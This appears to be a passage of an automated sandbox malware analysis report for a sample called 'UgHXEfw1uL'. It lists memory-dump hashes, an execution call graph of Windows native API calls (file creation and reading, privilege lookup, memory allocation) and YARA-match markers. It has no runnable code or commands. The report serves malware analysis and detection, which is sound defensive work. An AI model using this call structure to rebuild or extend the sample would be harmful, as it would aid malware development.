                                          • Opcode Fuzzy Hash: 64bc649f7a90a57e14693f826d72d5f7fa69fe3845546f99d780629b40c3cfe9
                                          • Instruction Fuzzy Hash: E641DAB0E0520A9BCB04CFA9D5455EEFBB2BF89340F24E469C455B7214E7349A41CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d6feaa4931b37c4db155bcc57f65da7645d453cf1ac02157a5a71346feafb29
                                          • Instruction ID: fd284850adcaeb9e004bf10367c88d2fe6f8116165279d4f62d23059f9746beb
                                          • Opcode Fuzzy Hash: 8d6feaa4931b37c4db155bcc57f65da7645d453cf1ac02157a5a71346feafb29
                                          • Instruction Fuzzy Hash: 56215CB0E096599FDB09CFABC94169EBBF7AFCA200F18C1ABD408E7261D7344945CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: af75586fd3a4fe0b76409c7c3f892b4f323159ad51c55cf67a7b09e92b10369f
                                          • Instruction ID: df34ef645ee54cd4e3307d7e12b23b5d69b9b2b9717a031fbb035ff81fb9a979
                                          • Opcode Fuzzy Hash: af75586fd3a4fe0b76409c7c3f892b4f323159ad51c55cf67a7b09e92b10369f
                                          • Instruction Fuzzy Hash: 1121BBB1E056189BEB18CFABD84069EFBF7AFC9300F14C07AD958A6254EB341A458F51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 069f609fb58cb348eaa40787b9305e396c81138c972d652833cc1f7d7eee6ece
                                          • Instruction ID: 8d13876e853a99d16defc5f46cf67454a66e1681e69a74365ee47e9442c1f2e6
                                          • Opcode Fuzzy Hash: 069f609fb58cb348eaa40787b9305e396c81138c972d652833cc1f7d7eee6ece
                                          • Instruction Fuzzy Hash: B421A9B1E056189FEB18CF6BD84179EFAF3AFC8300F14C07AD858A6254EB345A458F51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b94c8e6103784afd29e64221c7f96afbb8ec368689ae13588973019537f455ae
                                          • Instruction ID: da38635576d3fe6976d9dcd6f1a293260442e20fcd3f5ad90000054f753e23eb
                                          • Opcode Fuzzy Hash: b94c8e6103784afd29e64221c7f96afbb8ec368689ae13588973019537f455ae
                                          • Instruction Fuzzy Hash: 8B2136B1E1061C9BDB08CFABD9406AEFBF7AFC9200F14C13AD418A7214EB344A058F51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq
                                          • API String ID: 0-732967779
                                          • Opcode ID: be2fd13ce3630372b31e32597e6820047bd3516ed5dbe05055ed094273c1af51
                                          • Instruction ID: 16510ddb49da9bd4f065f0289dcf6df31ca63e2cdbba8c57e8a9b3873673451e
                                          • Opcode Fuzzy Hash: be2fd13ce3630372b31e32597e6820047bd3516ed5dbe05055ed094273c1af51
                                          • Instruction Fuzzy Hash: E6219570A0010A8FCB09EFA9D9515AF7B73FFC5300F5044A9D1056B2A6EE305A44CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq
                                          • API String ID: 0-732967779
                                          • Opcode ID: 4de323adcac4dd3bf35bb6adb6375dc449d7e3081bcc060f08dcfd12f1cba1a2
                                          • Instruction ID: fc0d14eebf8c01a55974231570f47b2a9157cd8005408f0439d7e0d7e77543db
                                          • Opcode Fuzzy Hash: 4de323adcac4dd3bf35bb6adb6375dc449d7e3081bcc060f08dcfd12f1cba1a2
                                          • Instruction Fuzzy Hash: 90214270B0010A9FCB09EFAAD9516AF7BB7FFC5300F504469D1056B2A5EF306A45CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:1.6%
                                          Dynamic/Decrypted Code Coverage:2.8%
                                          Signature Coverage:5.8%
                                          Total number of Nodes:568
                                          Total number of Limit Nodes:68
                                          execution_graph 91277 41f0e0 91278 41f0eb 91277->91278 91280 41b970 91277->91280 91281 41b996 91280->91281 91288 409d40 91281->91288 91283 41b9a2 91287 41b9c3 91283->91287 91296 40c1c0 91283->91296 91285 41b9b5 91332 41a6b0 91285->91332 91287->91278 91336 409c90 91288->91336 91290 409d4d 91291 409d54 91290->91291 91348 409c30 91290->91348 91291->91283 91297 40c1e5 91296->91297 91771 40b1c0 91297->91771 91299 40c23c 91775 40ae40 91299->91775 91301 40c4b3 91301->91285 91302 40c262 91302->91301 91784 4143a0 91302->91784 91304 40c2a7 91304->91301 91787 408a60 91304->91787 91306 40c2eb 91306->91301 91794 41a500 91306->91794 91310 40c341 91311 40c348 91310->91311 91806 41a010 91310->91806 91312 41bdc0 2 API calls 91311->91312 91314 40c355 91312->91314 91314->91285 91315 40c385 91316 40c392 91315->91316 91319 40c3a2 91315->91319 91317 41bdc0 2 API calls 91316->91317 91318 40c399 91317->91318 91318->91285 91320 40f4a0 4 API calls 91319->91320 91321 40c416 91320->91321 91321->91311 91322 40c421 91321->91322 91323 41bdc0 2 API calls 91322->91323 91324 40c445 91323->91324 91815 41a060 91324->91815 91327 41a010 3 API calls 91328 40c480 91327->91328 91328->91301 91821 419e20 91328->91821 91331 41a6b0 2 API calls 91331->91301 91333 41a6b8 91332->91333 91334 41a6cf ExitProcess 91333->91334 91335 41af60 LdrLoadDll 91333->91335 91335->91334 91368 418bc0 91336->91368 91340 409cb6 91340->91290 91341 409cac 91341->91340 91377 41b2b0 91341->91377 91343 409cf3 91343->91340 91389 409ab0 91343->91389 91345 409d13 91395 409620 LdrLoadDll 91345->91395 91347 409d25 91347->91290 91349 409c40 91348->91349 91350 41b5a0 LdrLoadDll 91349->91350 91351 409c4a 91350->91351 91352 41b5a0 LdrLoadDll 91351->91352 91353 409c5b 91352->91353 91354 41b5a0 LdrLoadDll 91353->91354 91355 409c71 91354->91355 91356 40f180 91355->91356 91357 40f199 91356->91357 91754 40b040 91357->91754 91359 40f1ac 91758 41a1e0 91359->91758 91362 409d65 91362->91283 91364 40f1d2 91365 40f1fd 91364->91365 91764 41a260 91364->91764 91367 41a490 2 API calls 91365->91367 91367->91362 91369 418bcf 91368->91369 91396 409c10 91369->91396 91371 418bed 91402 414e50 91371->91402 91373 409ca3 91374 418a70 91373->91374 91416 41a600 91374->91416 91378 409c10 LdrLoadDll 91377->91378 91379 41b2c9 91378->91379 91423 414a50 91379->91423 91381 41b2e1 91382 41b2ea 91381->91382 91462 41b0f0 91381->91462 91382->91343 91384 41b2fe 91384->91382 91480 419f00 91384->91480 91386 41b332 91386->91386 91485 41bdc0 91386->91485 91732 407ea0 91389->91732 91391 409ad1 91391->91345 91392 409aca 91392->91391 91745 408160 91392->91745 91395->91347 91397 409c20 91396->91397 91397->91371 91407 41b5a0 91397->91407 91400 41b5a0 LdrLoadDll 91401 409c71 91400->91401 91401->91371 91403 414e5e 91402->91403 91404 414e6a 91402->91404 91403->91404 91415 4152d0 LdrLoadDll 91403->91415 91404->91373 91406 414fbc 91406->91373 91408 41b5c3 91407->91408 91411 40acf0 91408->91411 91412 40ad14 91411->91412 91413 40ad50 LdrLoadDll 91412->91413 91414 409c5b 91412->91414 91413->91414 91414->91400 91415->91406 91417 418a85 91416->91417 91419 41af60 91416->91419 91417->91341 91420 41af70 91419->91420 91422 41af92 91419->91422 91421 414e50 LdrLoadDll 91420->91421 91421->91422 91422->91417 91424 414d85 91423->91424 91425 414a64 91423->91425 91424->91381 91425->91424 91488 419c50 91425->91488 91428 414b90 91491 41a360 91428->91491 91429 414b73 91548 41a460 LdrLoadDll 91429->91548 91432 414bb7 91434 41bdc0 2 API calls 91432->91434 91433 414b7d 91433->91381 91436 414bc3 91434->91436 91435 414d49 91438 41a490 2 API calls 91435->91438 91436->91433 91436->91435 91437 414d5f 91436->91437 91442 414c52 91436->91442 91557 414790 LdrLoadDll NtReadFile NtClose 91437->91557 91440 414d50 91438->91440 91440->91381 91441 414d72 91441->91381 91443 414cb9 91442->91443 91445 414c61 91442->91445 91443->91435 91444 414ccc 91443->91444 91550 41a2e0 91444->91550 91447 414c66 91445->91447 91448 414c7a 91445->91448 91549 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 91447->91549 91451 414c97 91448->91451 91452 414c7f 91448->91452 91451->91440 91506 414410 91451->91506 91494 4146f0 91452->91494 91454 414c70 91454->91381 91457 414d2c 91554 41a490 91457->91554 91458 414c8d 91458->91381 91459 414caf 91459->91381 91461 414d38 91461->91381 91463 41b101 91462->91463 91464 41b113 91463->91464 91576 41bd40 91463->91576 91464->91384 91466 41b134 91579 414070 91466->91579 91468 41b180 91468->91384 91469 41b157 91469->91468 91470 414070 3 API calls 91469->91470 91472 41b179 91470->91472 91472->91468 91604 415390 91472->91604 91473 41b20a 91474 41b21a 91473->91474 91699 41af00 LdrLoadDll 91473->91699 91615 41ad70 91474->91615 91477 41b248 91694 419ec0 91477->91694 91481 419f1c 91480->91481 91482 41af60 LdrLoadDll 91480->91482 91726 f62c0a 91481->91726 91482->91481 91483 419f37 91483->91386 91729 41a670 91485->91729 91487 41b359 91487->91343 91489 414b44 91488->91489 91490 41af60 LdrLoadDll 91488->91490 91489->91428 91489->91429 91489->91433 91490->91489 91492 41af60 LdrLoadDll 91491->91492 91493 41a37c NtCreateFile 91492->91493 91493->91432 91495 41470c 91494->91495 91496 41a2e0 LdrLoadDll 91495->91496 91497 41472d 91496->91497 91498 414734 91497->91498 91499 414748 91497->91499 91500 41a490 2 API calls 91498->91500 91501 41a490 2 API calls 91499->91501 91502 41473d 91500->91502 91503 414751 91501->91503 91502->91458 91558 41bfd0 LdrLoadDll RtlAllocateHeap 91503->91558 91505 41475c 91505->91458 91507 41445b 91506->91507 91509 41448e 91506->91509 91510 41a2e0 LdrLoadDll 91507->91510 91508 4145d9 91511 41a2e0 LdrLoadDll 91508->91511 91509->91508 91513 4144aa 91509->91513 91512 414476 91510->91512 91520 4145f4 91511->91520 91514 41a490 2 API calls 91512->91514 91515 41a2e0 LdrLoadDll 91513->91515 91516 41447f 91514->91516 91517 4144c5 91515->91517 91516->91459 91518 4144e1 91517->91518 91519 4144cc 91517->91519 91524 4144e6 91518->91524 91525 4144fc 91518->91525 91523 41a490 2 API calls 91519->91523 91572 41a320 LdrLoadDll 91520->91572 91522 41462e 91526 41a490 2 API calls 91522->91526 91527 4144d5 91523->91527 91528 41a490 2 API calls 91524->91528 91534 414501 91525->91534 91559 41bf90 91525->91559 91529 414639 91526->91529 91527->91459 91530 4144ef 91528->91530 91529->91459 91530->91459 91533 414567 91535 41457e 91533->91535 91571 41a2a0 LdrLoadDll 91533->91571 91541 414513 91534->91541 91562 41a410 91534->91562 91537 414585 91535->91537 91538 41459a 91535->91538 91539 41a490 2 API calls 91537->91539 91540 41a490 2 API calls 91538->91540 91539->91541 91542 4145a3 91540->91542 91541->91459 91543 4145cf 91542->91543 91566 41bb90 91542->91566 91543->91459 91545 4145ba 91546 41bdc0 2 API calls 91545->91546 91547 4145c3 91546->91547 91547->91459 91548->91433 91549->91454 91551 414d14 91550->91551 91552 41af60 LdrLoadDll 91550->91552 91553 41a320 LdrLoadDll 91551->91553 91552->91551 91553->91457 91555 41af60 LdrLoadDll 91554->91555 91556 41a4ac NtClose 91555->91556 91556->91461 91557->91441 91558->91505 91573 41a630 91559->91573 91561 41bfa8 91561->91534 91563 41a42c NtReadFile 91562->91563 91564 41af60 LdrLoadDll 91562->91564 91563->91533 91564->91563 91567 41bbb4 91566->91567 91568 41bb9d 91566->91568 91567->91545 91568->91567 91569 41bf90 2 API calls 91568->91569 91570 41bbcb 91569->91570 91570->91545 91571->91535 91572->91522 91574 41af60 LdrLoadDll 91573->91574 91575 41a64c RtlAllocateHeap 91574->91575 91575->91561 91700 41a540 91576->91700 91578 41bd6d 91578->91466 91580 414081 91579->91580 91581 414089 91579->91581 91580->91469 91603 41435c 91581->91603 91703 41cf30 91581->91703 91583 4140dd 91584 41cf30 2 API calls 91583->91584 91587 4140e8 91584->91587 91585 414136 91588 41cf30 2 API calls 91585->91588 91587->91585 91708 41cfd0 91587->91708 91590 41414a 91588->91590 91589 41cf30 2 API calls 91592 4141bd 91589->91592 91590->91589 91591 41cf30 2 API calls 91600 414205 91591->91600 91592->91591 91594 414334 91715 41cf90 LdrLoadDll RtlFreeHeap 91594->91715 91596 41433e 91716 41cf90 LdrLoadDll RtlFreeHeap 91596->91716 91598 414348 91717 41cf90 LdrLoadDll RtlFreeHeap 91598->91717 91714 41cf90 LdrLoadDll RtlFreeHeap 91600->91714 91601 414352 91718 41cf90 LdrLoadDll RtlFreeHeap 91601->91718 91603->91469 91605 409c10 LdrLoadDll 91604->91605 91606 4153a1 91605->91606 91607 414a50 9 API calls 91606->91607 91609 4153b7 91607->91609 91608 41540a 91608->91473 91609->91608 91610 4153f2 91609->91610 91611 415405 91609->91611 91612 41bdc0 2 API calls 91610->91612 91613 41bdc0 2 API calls 91611->91613 91614 4153f7 91612->91614 91613->91608 91614->91473 91616 41ad84 91615->91616 91617 41ac30 LdrLoadDll 91615->91617 91719 41ac30 91616->91719 91617->91616 91620 41ac30 LdrLoadDll 91621 41ad96 91620->91621 91622 41ac30 LdrLoadDll 91621->91622 91623 41ad9f 91622->91623 91624 41ac30 LdrLoadDll 91623->91624 91625 41ada8 91624->91625 91626 41ac30 LdrLoadDll 91625->91626 91627 41adb1 91626->91627 91628 41ac30 LdrLoadDll 91627->91628 91629 41adbd 91628->91629 91630 41ac30 LdrLoadDll 91629->91630 91631 41adc6 91630->91631 91632 41ac30 LdrLoadDll 91631->91632 91633 41adcf 91632->91633 91634 41ac30 LdrLoadDll 91633->91634 91635 41add8 91634->91635 91636 41ac30 LdrLoadDll 91635->91636 91637 41ade1 91636->91637 91638 41ac30 LdrLoadDll 91637->91638 91639 41adea 91638->91639 91640 41ac30 LdrLoadDll 91639->91640 91641 41adf6 91640->91641 91642 41ac30 LdrLoadDll 91641->91642 91643 41adff 91642->91643 91644 41ac30 LdrLoadDll 91643->91644 91645 41ae08 91644->91645 91646 41ac30 LdrLoadDll 91645->91646 91647 41ae11 91646->91647 91648 41ac30 LdrLoadDll 91647->91648 91649 41ae1a 91648->91649 91650 41ac30 LdrLoadDll 91649->91650 91651 41ae23 91650->91651 91652 41ac30 LdrLoadDll 91651->91652 91653 41ae2f 91652->91653 91654 41ac30 LdrLoadDll 91653->91654 91655 41ae38 91654->91655 91656 41ac30 LdrLoadDll 91655->91656 91657 41ae41 91656->91657 91658 41ac30 LdrLoadDll 91657->91658 91659 41ae4a 91658->91659 91660 41ac30 LdrLoadDll 91659->91660 91661 41ae53 91660->91661 91662 41ac30 LdrLoadDll 91661->91662 91663 41ae5c 91662->91663 91664 41ac30 LdrLoadDll 91663->91664 91665 41ae68 91664->91665 91666 41ac30 LdrLoadDll 91665->91666 91667 41ae71 91666->91667 91668 41ac30 LdrLoadDll 91667->91668 91669 41ae7a 91668->91669 91670 41ac30 LdrLoadDll 91669->91670 91671 41ae83 91670->91671 91672 41ac30 LdrLoadDll 91671->91672 91673 41ae8c 91672->91673 91674 41ac30 LdrLoadDll 91673->91674 91675 41ae95 91674->91675 91676 41ac30 LdrLoadDll 91675->91676 91677 41aea1 91676->91677 91678 41ac30 LdrLoadDll 91677->91678 91679 41aeaa 91678->91679 91680 41ac30 LdrLoadDll 91679->91680 91681 41aeb3 91680->91681 91682 41ac30 LdrLoadDll 91681->91682 91683 41aebc 91682->91683 91684 41ac30 LdrLoadDll 91683->91684 91685 41aec5 91684->91685 91686 41ac30 LdrLoadDll 91685->91686 91687 41aece 91686->91687 91688 41ac30 LdrLoadDll 91687->91688 91689 41aeda 91688->91689 91690 41ac30 LdrLoadDll 91689->91690 91691 41aee3 91690->91691 91692 41ac30 LdrLoadDll 91691->91692 91693 41aeec 91692->91693 91693->91477 91695 41af60 LdrLoadDll 91694->91695 91696 419edc 91695->91696 91725 f62df0 LdrInitializeThunk 91696->91725 91697 419ef3 91697->91384 91699->91474 91701 41af60 LdrLoadDll 91700->91701 91702 41a55c NtAllocateVirtualMemory 91701->91702 91702->91578 91704 41cf40 91703->91704 91705 41cf46 91703->91705 91704->91583 91706 41bf90 2 API calls 91705->91706 91707 41cf6c 91706->91707 91707->91583 91709 41cff5 91708->91709 91710 41d02d 91708->91710 91711 41bf90 2 API calls 91709->91711 91710->91587 91712 41d00a 91711->91712 91713 41bdc0 2 API calls 91712->91713 91713->91710 91714->91594 91715->91596 91716->91598 91717->91601 91718->91603 91720 41ac4b 91719->91720 91721 414e50 LdrLoadDll 91720->91721 91722 41ac6b 91721->91722 91723 414e50 LdrLoadDll 91722->91723 91724 41ad17 91722->91724 91723->91724 91724->91620 91725->91697 91727 f62c11 91726->91727 91728 f62c1f LdrInitializeThunk 91726->91728 91727->91483 91728->91483 91730 41af60 LdrLoadDll 91729->91730 91731 41a68c RtlFreeHeap 91730->91731 91731->91487 91733 407eb0 91732->91733 91734 407eab 91732->91734 91735 41bd40 2 API calls 91733->91735 91734->91392 91741 407ed5 91735->91741 91736 407f38 91736->91392 91737 419ec0 2 API calls 91737->91741 91738 407f3e 91740 407f64 91738->91740 91742 41a5c0 2 API calls 91738->91742 91740->91392 91741->91736 91741->91737 91741->91738 91744 41bd40 2 API calls 91741->91744 91748 41a5c0 91741->91748 91743 407f55 91742->91743 91743->91392 91744->91741 91746 40817e 91745->91746 91747 41a5c0 2 API calls 91745->91747 91746->91345 91747->91746 91749 41af60 LdrLoadDll 91748->91749 91750 41a5dc 91749->91750 91753 f62c70 LdrInitializeThunk 91750->91753 91751 41a5f3 91751->91741 91753->91751 91755 40b063 91754->91755 91757 40b0e0 91755->91757 91769 419c90 LdrLoadDll 91755->91769 91757->91359 91759 41af60 LdrLoadDll 91758->91759 91760 40f1bb 91759->91760 91760->91362 91761 41a7d0 91760->91761 91762 41af60 LdrLoadDll 91761->91762 91763 41a7ef LookupPrivilegeValueW 91762->91763 91763->91364 91765 41a27c 91764->91765 91766 41af60 LdrLoadDll 91764->91766 91770 f62ea0 LdrInitializeThunk 91765->91770 91766->91765 91767 41a29b 91767->91365 91769->91757 91770->91767 91772 40b1f0 91771->91772 91773 40b040 LdrLoadDll 91772->91773 91774 40b204 91773->91774 91774->91299 91776 40ae51 91775->91776 91777 40ae4d 91775->91777 91778 40ae6a 91776->91778 91779 40ae9c 91776->91779 91777->91302 91826 419cd0 LdrLoadDll 91778->91826 91827 419cd0 LdrLoadDll 91779->91827 91781 40aead 91781->91302 91783 40ae8c 91783->91302 91785 40f4a0 4 API calls 91784->91785 91786 4143c6 91785->91786 91786->91304 91828 4087a0 91787->91828 91790 408a9d 91790->91306 91791 4087a0 19 API calls 91792 408a8a 91791->91792 91792->91790 91846 40f710 11 API calls 91792->91846 91795 41af60 LdrLoadDll 91794->91795 91796 41a51c 91795->91796 91967 f62e80 LdrInitializeThunk 91796->91967 91797 40c322 91799 40f4a0 91797->91799 91800 40f4bd 91799->91800 91968 419fc0 91800->91968 91802 40f505 91802->91310 91804 41a010 3 API calls 91805 40f52e 91804->91805 91805->91310 91807 41a02c 91806->91807 91808 41af60 LdrLoadDll 91806->91808 91974 f62d10 LdrInitializeThunk 91807->91974 91808->91807 91809 41a05b 91809->91315 91810 41af60 LdrLoadDll 91809->91810 91811 41a07c 91810->91811 91975 f62d30 LdrInitializeThunk 91811->91975 91812 41a08b 91812->91315 91816 41a066 91815->91816 91817 41af60 LdrLoadDll 91816->91817 91818 41a07c 91817->91818 91976 f62d30 LdrInitializeThunk 91818->91976 91819 40c459 91819->91327 91822 41af60 LdrLoadDll 91821->91822 91823 419e3c 91822->91823 91977 f62fb0 LdrInitializeThunk 91823->91977 91824 40c4ac 91824->91331 91826->91783 91827->91781 91829 407ea0 4 API calls 91828->91829 91838 4087ba 91828->91838 91829->91838 91830 408a49 91830->91790 91830->91791 91831 408a3f 91832 408160 2 API calls 91831->91832 91832->91830 91835 419f00 2 API calls 91835->91838 91837 41a490 LdrLoadDll NtClose 91837->91838 91838->91830 91838->91831 91838->91835 91838->91837 91841 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 91838->91841 91844 419e20 2 API calls 91838->91844 91847 419d10 91838->91847 91850 4085d0 91838->91850 91864 40f5f0 LdrLoadDll NtClose 91838->91864 91865 419d90 LdrLoadDll 91838->91865 91866 419dc0 LdrLoadDll 91838->91866 91867 419e50 LdrLoadDll 91838->91867 91868 4083a0 91838->91868 91884 405f60 LdrLoadDll 91838->91884 91841->91838 91844->91838 91846->91790 91848 41af60 LdrLoadDll 91847->91848 91849 419d2c 91848->91849 91849->91838 91851 4085e6 91850->91851 91885 419880 91851->91885 91853 408771 91853->91838 91854 4085ff 91854->91853 91855 409c10 LdrLoadDll 91854->91855 91856 4086a4 91855->91856 91906 4081a0 91856->91906 91858 4086e5 91858->91853 91859 4083a0 12 API calls 91858->91859 91860 408713 91859->91860 91860->91853 91861 419f00 2 API calls 91860->91861 91862 408748 91861->91862 91862->91853 91863 41a500 2 API calls 91862->91863 91863->91853 91864->91838 91865->91838 91866->91838 91867->91838 91869 4083c9 91868->91869 91946 408310 91869->91946 91872 41a500 2 API calls 91873 4083dc 91872->91873 91873->91872 91874 408467 91873->91874 91876 408462 91873->91876 91954 40f670 91873->91954 91874->91838 91875 41a490 2 API calls 91877 40849a 91875->91877 91876->91875 91877->91874 91878 419d10 LdrLoadDll 91877->91878 91879 4084ff 91878->91879 91879->91874 91958 419d50 91879->91958 91881 408563 91881->91874 91882 414a50 9 API calls 91881->91882 91883 4085b8 91882->91883 91883->91838 91884->91838 91886 41bf90 2 API calls 91885->91886 91887 419897 91886->91887 91913 409310 91887->91913 91889 4198b2 91890 4198f0 91889->91890 91891 4198d9 91889->91891 91894 41bd40 2 API calls 91890->91894 91892 41bdc0 2 API calls 91891->91892 91893 4198e6 91892->91893 91893->91854 91895 41992a 91894->91895 91896 41bd40 2 API calls 91895->91896 91897 419943 91896->91897 91903 419be4 91897->91903 91919 41bd80 91897->91919 91900 419bd0 91901 41bdc0 2 API calls 91900->91901 91902 419bda 91901->91902 91902->91854 91904 41bdc0 2 API calls 91903->91904 91905 419c39 91904->91905 91905->91854 91907 40829f 91906->91907 91908 4081b5 91906->91908 91907->91858 91908->91907 91909 414a50 9 API calls 91908->91909 91910 408222 91909->91910 91911 41bdc0 2 API calls 91910->91911 91912 408249 91910->91912 91911->91912 91912->91858 91914 409335 91913->91914 91915 40acf0 LdrLoadDll 91914->91915 91916 409368 91915->91916 91917 40938d 91916->91917 91922 40cf20 91916->91922 91917->91889 91940 41a580 91919->91940 91923 40cf4c 91922->91923 91924 41a1e0 LdrLoadDll 91923->91924 91925 40cf65 91924->91925 91926 40cf6c 91925->91926 91933 41a220 91925->91933 91926->91917 91930 40cfa7 91931 41a490 2 API calls 91930->91931 91932 40cfca 91931->91932 91932->91917 91934 41a23c 91933->91934 91935 41af60 LdrLoadDll 91933->91935 91939 f62ca0 LdrInitializeThunk 91934->91939 91935->91934 91936 40cf8f 91936->91926 91938 41a810 LdrLoadDll 91936->91938 91938->91930 91939->91936 91941 41af60 LdrLoadDll 91940->91941 91942 41a59c 91941->91942 91945 f62f90 LdrInitializeThunk 91942->91945 91943 419bc9 91943->91900 91943->91903 91945->91943 91947 408328 91946->91947 91948 40acf0 LdrLoadDll 91947->91948 91949 408343 91948->91949 91950 414e50 LdrLoadDll 91949->91950 91951 408353 91950->91951 91952 40835c PostThreadMessageW 91951->91952 91953 408370 91951->91953 91952->91953 91953->91873 91955 40f683 91954->91955 91961 419e90 91955->91961 91959 41af60 LdrLoadDll 91958->91959 91960 419d6c 91959->91960 91960->91881 91962 419eac 91961->91962 91963 41af60 LdrLoadDll 91961->91963 91966 f62dd0 LdrInitializeThunk 91962->91966 91963->91962 91964 40f6ae 91964->91873 91966->91964 91967->91797 91969 41af60 LdrLoadDll 91968->91969 91970 419fdc 91969->91970 91973 f62f30 LdrInitializeThunk 91970->91973 91971 40f4fe 91971->91802 91971->91804 91973->91971 91974->91809 91975->91812 91976->91819 91977->91824 91980 f62ad0 LdrInitializeThunk

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 41a3b3-41a3b8 1 41a438-41a459 NtReadFile 0->1 2 41a3ba-41a3bd 0->2 3 41a379-41a3b1 NtCreateFile 2->3 4 41a3bf 2->4 4->1
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateRead
                                          • String ID: 1JA$rMA$rMA
                                          • API String ID: 3388366904-782607585
                                          • Opcode ID: 9df585ef7528c99330dd9c225abfa0f77081c8156534e38467a865fb8406da49
                                          • Instruction ID: da19e3345d12220765821cfa474dde94d4a6965fe5b4db37016d0a13ebef53ee
                                          • Opcode Fuzzy Hash: 9df585ef7528c99330dd9c225abfa0f77081c8156534e38467a865fb8406da49
                                          • Instruction Fuzzy Hash: F6019EB2204049AFDB48CF98E890CEB77EDAF8C714B158649FA5CC7214D634E851CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5 41a410-41a426 6 41a42c-41a459 NtReadFile 5->6 7 41a427 call 41af60 5->7 7->6
                                          APIs
                                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 1JA$rMA$rMA
                                          • API String ID: 2738559852-782607585
                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 9 41a40d-41a459 call 41af60 NtReadFile
                                          APIs
                                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 1JA$rMA$rMA
